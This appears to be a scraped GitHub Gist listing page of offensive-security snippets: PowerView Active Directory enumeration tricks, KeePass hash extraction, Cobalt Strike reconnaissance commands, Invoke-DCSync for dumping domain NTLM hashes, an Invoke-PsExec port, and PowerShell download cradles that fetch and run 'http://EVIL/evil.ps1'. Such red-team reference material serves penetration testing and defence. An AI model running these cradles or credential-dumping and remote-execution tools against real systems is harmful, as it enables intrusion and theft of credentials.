geeking out about Kerberos

Will HarmJ0y

HarmJ0y / PowerView-3.0-tricks.ps1
Last active Mar 1, 2021
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
HarmJ0y / PowerView-2.0-tricks.ps1
Last active Feb 25, 2021
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (
# has an updated tricks Gist at
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
HarmJ0y /
Created Jun 30, 2016
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
# Python port of keepass2john from the John the Ripper suite (
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from:
# Python port by @harmj0y, GNU General Public License
HarmJ0y / DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / Find-KeePassconfig.ps1
Created Jul 4, 2016
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
function Find-KeePassconfig {
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
HarmJ0y / Jenkinsfile
Created Nov 2, 2020
Rubeus Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL:
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = ""
HarmJ0y / Invoke-DCSync.ps1
Last active Feb 2, 2021 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
function Invoke-DCSync
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Jan 22, 2021
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / Invoke-Psexec.ps1
function Invoke-PsExec {
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the